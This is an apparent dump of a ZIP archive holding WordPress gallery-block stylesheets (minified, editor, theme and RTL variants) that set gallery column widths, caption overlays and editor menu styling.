.blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-item{margin-left:1em;width:calc(33.33333% - .66667em)}.blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-item{margin-left:1em;width:calc(25% - .75em)}.blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-item{margin-left:1em;width:calc(20% - .8em)}.blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-item{margin-left:1em;width:calc(16.66667% - .83333em)}.blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-item{margin-left:1em;width:calc(14.28571% - .85714em)}.blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-item{margin-left:1em;width:calc(12.5% - .875em)}.blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-image:nth-of-type(1n),.blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-item:nth-of-type(1n),.blocks-gallery-grid:not(.has-nested-images).columns-2 .blocks-gallery-image:nth-of-type(2n),.blocks-gallery-grid:not(.has-nested-images).columns-2 .blocks-gallery-item:nth-of-type(2n),.blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-image:nth-of-type(3n),.blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-item:nth-of-type(3n),.blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-image:nth-of-type(4n),.blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-item:nth-of-type(4n),.blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-image:nth-of-type(5n),.blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-item:nth-of-type(5n),.blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-image:nth-of-type(6n),.blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-item:nth-of-type(6n),.blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-image:nth-of-type(7n),.blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-item:nth-of-type(7n),.blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-image:nth-of-type(8n),.blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-item:nth-of-type(8n),.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-image:nth-of-type(1n),.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-item:nth-of-type(1n),.wp-block-gallery:not(.has-nested-images).columns-2 .blocks-gallery-image:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images).columns-2 .blocks-gallery-item:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-image:nth-of-type(3n),.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-item:nth-of-type(3n),.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-image:nth-of-type(4n),.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-item:nth-of-type(4n),.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-image:nth-of-type(5n),.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-item:nth-of-type(5n),.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-image:nth-of-type(6n),.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-item:nth-of-type(6n),.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-image:nth-of-type(7n),.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-item:nth-of-type(7n),.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-image:nth-of-type(8n),.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-item:nth-of-type(8n){margin-left:0}}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image:last-child,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item:last-child,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image:last-child,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item:last-child{margin-left:0}.blocks-gallery-grid:not(.has-nested-images).alignleft,.blocks-gallery-grid:not(.has-nested-images).alignright,.wp-block-gallery:not(.has-nested-images).alignleft,.wp-block-gallery:not(.has-nested-images).alignright{max-width:420px;width:100%}.blocks-gallery-grid:not(.has-nested-images).aligncenter .blocks-gallery-item figure,.wp-block-gallery:not(.has-nested-images).aligncenter .blocks-gallery-item figure{justify-content:center}.wp-block-gallery:not(.is-cropped) .blocks-gallery-item{align-self:flex-start}figure.wp-block-gallery.has-nested-images{align-items:normal}.wp-block-gallery.has-nested-images figure.wp-block-image:not(#individual-image){margin:0;width:calc(50% - var(--wp--style--unstable-gallery-gap, 16px)/2)}.wp-block-gallery.has-nested-images figure.wp-block-image{box-sizing:border-box;display:flex;flex-direction:column;flex-grow:1;justify-content:center;max-width:100%;position:relative}.wp-block-gallery.has-nested-images figure.wp-block-image>a,.wp-block-gallery.has-nested-images figure.wp-block-image>div{flex-direction:column;flex-grow:1;margin:0}.wp-block-gallery.has-nested-images figure.wp-block-image img{display:block;height:auto;max-width:100%!important;width:auto}.wp-block-gallery.has-nested-images figure.wp-block-image figcaption{background:linear-gradient(0deg,rgba(0,0,0,.7),rgba(0,0,0,.3) 70%,transparent);bottom:0;box-sizing:border-box;color:#fff;font-size:13px;margin-bottom:0;max-height:60%;overflow:auto;padding:0 8px 8px;position:absolute;right:0;text-align:center;width:100%}.wp-block-gallery.has-nested-images figure.wp-block-image figcaption img{display:inline}.wp-block-gallery.has-nested-images figure.wp-block-image figcaption a{color:inherit}.wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border img{box-sizing:border-box}.wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border>a,.wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border>div,.wp-block-gallery.has-nested-images figure.wp-block-image.is-style-rounded>a,.wp-block-gallery.has-nested-images figure.wp-block-image.is-style-rounded>div{flex:1 1 auto}.wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border figcaption,.wp-block-gallery.has-nested-images figure.wp-block-image.is-style-rounded figcaption{background:none;color:inherit;flex:initial;margin:0;padding:10px 10px 9px;position:relative}.wp-block-gallery.has-nested-images figcaption{flex-basis:100%;flex-grow:1;text-align:center}.wp-block-gallery.has-nested-images:not(.is-cropped) figure.wp-block-image:not(#individual-image){margin-bottom:auto;margin-top:0}.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image){align-self:inherit}.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image)>a,.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image)>div:not(.components-drop-zone){display:flex}.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image) a,.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image) img{flex:1 0 0%;height:100%;object-fit:cover;width:100%}.wp-block-gallery.has-nested-images.columns-1 figure.wp-block-image:not(#individual-image){width:100%}@media (min-width:600px){.wp-block-gallery.has-nested-images.columns-3 figure.wp-block-image:not(#individual-image){width:calc(33.33333% - var(--wp--style--unstable-gallery-gap, 16px)*.66667)}.wp-block-gallery.has-nested-images.columns-4 figure.wp-block-image:not(#individual-image){width:calc(25% - var(--wp--style--unstable-gallery-gap, 16px)*.75)}.wp-block-gallery.has-nested-images.columns-5 figure.wp-block-image:not(#individual-image){width:calc(20% - var(--wp--style--unstable-gallery-gap, 16px)*.8)}.wp-block-gallery.has-nested-images.columns-6 figure.wp-block-image:not(#individual-image){width:calc(16.66667% - var(--wp--style--unstable-gallery-gap, 16px)*.83333)}.wp-block-gallery.has-nested-images.columns-7 figure.wp-block-image:not(#individual-image){width:calc(14.28571% - var(--wp--style--unstable-gallery-gap, 16px)*.85714)}.wp-block-gallery.has-nested-images.columns-8 figure.wp-block-image:not(#individual-image){width:calc(12.5% - var(--wp--style--unstable-gallery-gap, 16px)*.875)}.wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image){width:calc(33.33% - var(--wp--style--unstable-gallery-gap, 16px)*.66667)}.wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image):first-child:nth-last-child(2),.wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image):first-child:nth-last-child(2)~figure.wp-block-image:not(#individual-image){width:calc(50% - var(--wp--style--unstable-gallery-gap, 16px)*.5)}.wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image):first-child:last-child{width:100%}}.wp-block-gallery.has-nested-images.alignleft,.wp-block-gallery.has-nested-images.alignright{max-width:420px;width:100%}.wp-block-gallery.has-nested-images.aligncenter{justify-content:center}PK6[4gallery/theme.cssnu[.blocks-gallery-caption{ color:#555; font-size:13px; text-align:center; } .is-dark-theme .blocks-gallery-caption{ color:hsla(0,0%,100%,.65); }PK6[ywgallery/theme-rtl.min.cssnu[.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:hsla(0,0%,100%,.65)}PK6[78fPPgallery/editor.cssnu[figure.wp-block-gallery{ display:block; } figure.wp-block-gallery>.blocks-gallery-caption{ flex:0 0 100%; } figure.wp-block-gallery>.blocks-gallery-media-placeholder-wrapper{ flex-basis:100%; } figure.wp-block-gallery .wp-block-image .components-notice.is-error{ display:block; } figure.wp-block-gallery .wp-block-image .components-notice__content{ margin:4px 0; } figure.wp-block-gallery .wp-block-image .components-notice__dismiss{ position:absolute; right:5px; top:0; } figure.wp-block-gallery .block-editor-media-placeholder.is-appender .components-placeholder__label{ display:none; } figure.wp-block-gallery .block-editor-media-placeholder.is-appender .block-editor-media-placeholder__button{ margin-bottom:0; } figure.wp-block-gallery .block-editor-media-placeholder{ margin:0; } figure.wp-block-gallery .block-editor-media-placeholder .components-placeholder__label{ display:flex; } figure.wp-block-gallery .block-editor-media-placeholder figcaption{ z-index:2; } figure.wp-block-gallery .components-spinner{ left:50%; margin-left:-9px; margin-top:-9px; position:absolute; top:50%; } .gallery-settings-buttons .components-button:first-child{ margin-right:8px; } .gallery-image-sizes .components-base-control__label{ display:block; margin-bottom:4px; } .gallery-image-sizes .gallery-image-sizes__loading{ align-items:center; color:#757575; display:flex; font-size:12px; } .gallery-image-sizes .components-spinner{ margin:0 8px 0 4px; } .blocks-gallery-item figure:not(.is-selected):focus,.blocks-gallery-item img:focus{ outline:none; } .blocks-gallery-item figure.is-selected:before{ bottom:0; box-shadow:0 0 0 1px #fff inset, 0 0 0 3px var(--wp-admin-theme-color) inset; content:""; left:0; outline:2px solid transparent; pointer-events:none; position:absolute; right:0; top:0; z-index:1; } .blocks-gallery-item figure.is-transient img{ opacity:.3; } .blocks-gallery-item .is-selected .block-library-gallery-item__inline-menu{ display:inline-flex; } .blocks-gallery-item .block-editor-media-placeholder{ height:100%; margin:0; } .blocks-gallery-item .block-editor-media-placeholder .components-placeholder__label{ display:flex; } .block-library-gallery-item__inline-menu{ background:#fff; border:1px solid #1e1e1e; border-radius:2px; display:none; margin:8px; position:absolute; top:-2px; transition:box-shadow .2s ease-out; z-index:20; } @media (prefers-reduced-motion:reduce){ .block-library-gallery-item__inline-menu{ transition-delay:0s; transition-duration:0s; } } .block-library-gallery-item__inline-menu:hover{ box-shadow:0 .7px 1px rgba(0,0,0,.1),0 1.2px 1.7px -.2px rgba(0,0,0,.1),0 2.3px 3.3px -.5px rgba(0,0,0,.1); } @media (min-width:600px){ .columns-7 .block-library-gallery-item__inline-menu,.columns-8 .block-library-gallery-item__inline-menu{ padding:2px; } } .block-library-gallery-item__inline-menu .components-button.has-icon:not(:focus){ border:none; box-shadow:none; } @media (min-width:600px){ .columns-7 .block-library-gallery-item__inline-menu .components-button.has-icon,.columns-8 .block-library-gallery-item__inline-menu .components-button.has-icon{ height:inherit; padding:0; width:inherit; } } .block-library-gallery-item__inline-menu.is-left{ left:-2px; } .block-library-gallery-item__inline-menu.is-right{ right:-2px; } .wp-block-gallery ul.blocks-gallery-grid{ margin:0; padding:0; } @media (min-width:600px){ .wp-block-update-gallery-modal{ max-width:480px; } } .wp-block-update-gallery-modal-buttons{ display:flex; gap:12px; justify-content:flex-end; }PK6[ywgallery/theme.min.cssnu[.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:hsla(0,0%,100%,.65)}PK6[o77gallery/style.min.cssnu[.blocks-gallery-grid:not(.has-nested-images),.wp-block-gallery:not(.has-nested-images){display:flex;flex-wrap:wrap;list-style-type:none;margin:0;padding:0}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item{display:flex;flex-direction:column;flex-grow:1;justify-content:center;margin:0 1em 1em 0;position:relative;width:calc(50% - 1em)}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image:nth-of-type(2n),.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item:nth-of-type(2n){margin-right:0}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image figure,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item figure,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image figure,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item figure{align-items:flex-end;display:flex;height:100%;justify-content:flex-start;margin:0}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image img,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item img{display:block;height:auto;max-width:100%;width:auto}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image figcaption,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item figcaption,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image figcaption,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item figcaption{background:linear-gradient(0deg,rgba(0,0,0,.7),rgba(0,0,0,.3) 70%,transparent);bottom:0;box-sizing:border-box;color:#fff;font-size:.8em;margin:0;max-height:100%;overflow:auto;padding:3em .77em .7em;position:absolute;text-align:center;width:100%;z-index:2}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image figcaption img,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item figcaption img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image figcaption img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item figcaption img{display:inline}.blocks-gallery-grid:not(.has-nested-images) figcaption,.wp-block-gallery:not(.has-nested-images) figcaption{flex-grow:1}.blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-image a,.blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-image img,.blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-item a,.blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-item img,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-image a,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-image img,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-item a,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-item img{flex:1;height:100%;object-fit:cover;width:100%}.blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-item{margin-right:0;width:100%}@media (min-width:600px){.blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-item{margin-right:1em;width:calc(33.33333% - .66667em)}.blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-item{margin-right:1em;width:calc(25% - .75em)}.blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-item{margin-right:1em;width:calc(20% - .8em)}.blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-item{margin-right:1em;width:calc(16.66667% - .83333em)}.blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-item{margin-right:1em;width:calc(14.28571% - .85714em)}.blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-item{margin-right:1em;width:calc(12.5% - .875em)}.blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-image:nth-of-type(1n),.blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-item:nth-of-type(1n),.blocks-gallery-grid:not(.has-nested-images).columns-2 .blocks-gallery-image:nth-of-type(2n),.blocks-gallery-grid:not(.has-nested-images).columns-2 .blocks-gallery-item:nth-of-type(2n),.blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-image:nth-of-type(3n),.blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-item:nth-of-type(3n),.blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-image:nth-of-type(4n),.blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-item:nth-of-type(4n),.blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-image:nth-of-type(5n),.blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-item:nth-of-type(5n),.blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-image:nth-of-type(6n),.blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-item:nth-of-type(6n),.blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-image:nth-of-type(7n),.blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-item:nth-of-type(7n),.blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-image:nth-of-type(8n),.blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-item:nth-of-type(8n),.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-image:nth-of-type(1n),.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-item:nth-of-type(1n),.wp-block-gallery:not(.has-nested-images).columns-2 .blocks-gallery-image:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images).columns-2 .blocks-gallery-item:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-image:nth-of-type(3n),.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-item:nth-of-type(3n),.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-image:nth-of-type(4n),.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-item:nth-of-type(4n),.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-image:nth-of-type(5n),.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-item:nth-of-type(5n),.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-image:nth-of-type(6n),.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-item:nth-of-type(6n),.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-image:nth-of-type(7n),.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-item:nth-of-type(7n),.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-image:nth-of-type(8n),.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-item:nth-of-type(8n){margin-right:0}}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image:last-child,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item:last-child,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image:last-child,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item:last-child{margin-right:0}.blocks-gallery-grid:not(.has-nested-images).alignleft,.blocks-gallery-grid:not(.has-nested-images).alignright,.wp-block-gallery:not(.has-nested-images).alignleft,.wp-block-gallery:not(.has-nested-images).alignright{max-width:420px;width:100%}.blocks-gallery-grid:not(.has-nested-images).aligncenter .blocks-gallery-item figure,.wp-block-gallery:not(.has-nested-images).aligncenter .blocks-gallery-item figure{justify-content:center}.wp-block-gallery:not(.is-cropped) .blocks-gallery-item{align-self:flex-start}figure.wp-block-gallery.has-nested-images{align-items:normal}.wp-block-gallery.has-nested-images figure.wp-block-image:not(#individual-image){margin:0;width:calc(50% - var(--wp--style--unstable-gallery-gap, 16px)/2)}.wp-block-gallery.has-nested-images figure.wp-block-image{box-sizing:border-box;display:flex;flex-direction:column;flex-grow:1;justify-content:center;max-width:100%;position:relative}.wp-block-gallery.has-nested-images figure.wp-block-image>a,.wp-block-gallery.has-nested-images figure.wp-block-image>div{flex-direction:column;flex-grow:1;margin:0}.wp-block-gallery.has-nested-images figure.wp-block-image img{display:block;height:auto;max-width:100%!important;width:auto}.wp-block-gallery.has-nested-images figure.wp-block-image figcaption{background:linear-gradient(0deg,rgba(0,0,0,.7),rgba(0,0,0,.3) 70%,transparent);bottom:0;box-sizing:border-box;color:#fff;font-size:13px;left:0;margin-bottom:0;max-height:60%;overflow:auto;padding:0 8px 8px;position:absolute;text-align:center;width:100%}.wp-block-gallery.has-nested-images figure.wp-block-image figcaption img{display:inline}.wp-block-gallery.has-nested-images figure.wp-block-image figcaption a{color:inherit}.wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border img{box-sizing:border-box}.wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border>a,.wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border>div,.wp-block-gallery.has-nested-images figure.wp-block-image.is-style-rounded>a,.wp-block-gallery.has-nested-images figure.wp-block-image.is-style-rounded>div{flex:1 1 auto}.wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border figcaption,.wp-block-gallery.has-nested-images figure.wp-block-image.is-style-rounded figcaption{background:none;color:inherit;flex:initial;margin:0;padding:10px 10px 9px;position:relative}.wp-block-gallery.has-nested-images figcaption{flex-basis:100%;flex-grow:1;text-align:center}.wp-block-gallery.has-nested-images:not(.is-cropped) figure.wp-block-image:not(#individual-image){margin-bottom:auto;margin-top:0}.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image){align-self:inherit}.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image)>a,.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image)>div:not(.components-drop-zone){display:flex}.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image) a,.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image) img{flex:1 0 0%;height:100%;object-fit:cover;width:100%}.wp-block-gallery.has-nested-images.columns-1 figure.wp-block-image:not(#individual-image){width:100%}@media (min-width:600px){.wp-block-gallery.has-nested-images.columns-3 figure.wp-block-image:not(#individual-image){width:calc(33.33333% - var(--wp--style--unstable-gallery-gap, 16px)*.66667)}.wp-block-gallery.has-nested-images.columns-4 figure.wp-block-image:not(#individual-image){width:calc(25% - var(--wp--style--unstable-gallery-gap, 16px)*.75)}.wp-block-gallery.has-nested-images.columns-5 figure.wp-block-image:not(#individual-image){width:calc(20% - var(--wp--style--unstable-gallery-gap, 16px)*.8)}.wp-block-gallery.has-nested-images.columns-6 figure.wp-block-image:not(#individual-image){width:calc(16.66667% - var(--wp--style--unstable-gallery-gap, 16px)*.83333)}.wp-block-gallery.has-nested-images.columns-7 figure.wp-block-image:not(#individual-image){width:calc(14.28571% - var(--wp--style--unstable-gallery-gap, 16px)*.85714)}.wp-block-gallery.has-nested-images.columns-8 figure.wp-block-image:not(#individual-image){width:calc(12.5% - var(--wp--style--unstable-gallery-gap, 16px)*.875)}.wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image){width:calc(33.33% - var(--wp--style--unstable-gallery-gap, 16px)*.66667)}.wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image):first-child:nth-last-child(2),.wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image):first-child:nth-last-child(2)~figure.wp-block-image:not(#individual-image){width:calc(50% - var(--wp--style--unstable-gallery-gap, 16px)*.5)}.wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image):first-child:last-child{width:100%}}.wp-block-gallery.has-nested-images.alignleft,.wp-block-gallery.has-nested-images.alignright{max-width:420px;width:100%}.wp-block-gallery.has-nested-images.aligncenter{justify-content:center}PK6[4gallery/theme-rtl.cssnu[.blocks-gallery-caption{ color:#555; font-size:13px; text-align:center; } .is-dark-theme .blocks-gallery-caption{ color:hsla(0,0%,100%,.65); }PK6[PPgallery/editor-rtl.cssnu[figure.wp-block-gallery{ display:block; } figure.wp-block-gallery>.blocks-gallery-caption{ flex:0 0 100%; } figure.wp-block-gallery>.blocks-gallery-media-placeholder-wrapper{ flex-basis:100%; } figure.wp-block-gallery .wp-block-image .components-notice.is-error{ display:block; } figure.wp-block-gallery .wp-block-image .components-notice__content{ margin:4px 0; } figure.wp-block-gallery .wp-block-image .components-notice__dismiss{ left:5px; position:absolute; top:0; } figure.wp-block-gallery .block-editor-media-placeholder.is-appender .components-placeholder__label{ display:none; } figure.wp-block-gallery .block-editor-media-placeholder.is-appender .block-editor-media-placeholder__button{ margin-bottom:0; } figure.wp-block-gallery .block-editor-media-placeholder{ margin:0; } figure.wp-block-gallery .block-editor-media-placeholder .components-placeholder__label{ display:flex; } figure.wp-block-gallery .block-editor-media-placeholder figcaption{ z-index:2; } figure.wp-block-gallery .components-spinner{ margin-right:-9px; margin-top:-9px; position:absolute; right:50%; top:50%; } .gallery-settings-buttons .components-button:first-child{ margin-left:8px; } .gallery-image-sizes .components-base-control__label{ display:block; margin-bottom:4px; } .gallery-image-sizes .gallery-image-sizes__loading{ align-items:center; color:#757575; display:flex; font-size:12px; } .gallery-image-sizes .components-spinner{ margin:0 4px 0 8px; } .blocks-gallery-item figure:not(.is-selected):focus,.blocks-gallery-item img:focus{ outline:none; } .blocks-gallery-item figure.is-selected:before{ bottom:0; box-shadow:0 0 0 1px #fff inset, 0 0 0 3px var(--wp-admin-theme-color) inset; content:""; left:0; outline:2px solid transparent; pointer-events:none; position:absolute; right:0; top:0; z-index:1; } .blocks-gallery-item figure.is-transient img{ opacity:.3; } .blocks-gallery-item .is-selected .block-library-gallery-item__inline-menu{ display:inline-flex; } .blocks-gallery-item .block-editor-media-placeholder{ height:100%; margin:0; } .blocks-gallery-item .block-editor-media-placeholder .components-placeholder__label{ display:flex; } .block-library-gallery-item__inline-menu{ background:#fff; border:1px solid #1e1e1e; border-radius:2px; display:none; margin:8px; position:absolute; top:-2px; transition:box-shadow .2s ease-out; z-index:20; } @media (prefers-reduced-motion:reduce){ .block-library-gallery-item__inline-menu{ transition-delay:0s; transition-duration:0s; } } .block-library-gallery-item__inline-menu:hover{ box-shadow:0 .7px 1px rgba(0,0,0,.1),0 1.2px 1.7px -.2px rgba(0,0,0,.1),0 2.3px 3.3px -.5px rgba(0,0,0,.1); } @media (min-width:600px){ .columns-7 .block-library-gallery-item__inline-menu,.columns-8 .block-library-gallery-item__inline-menu{ padding:2px; } } 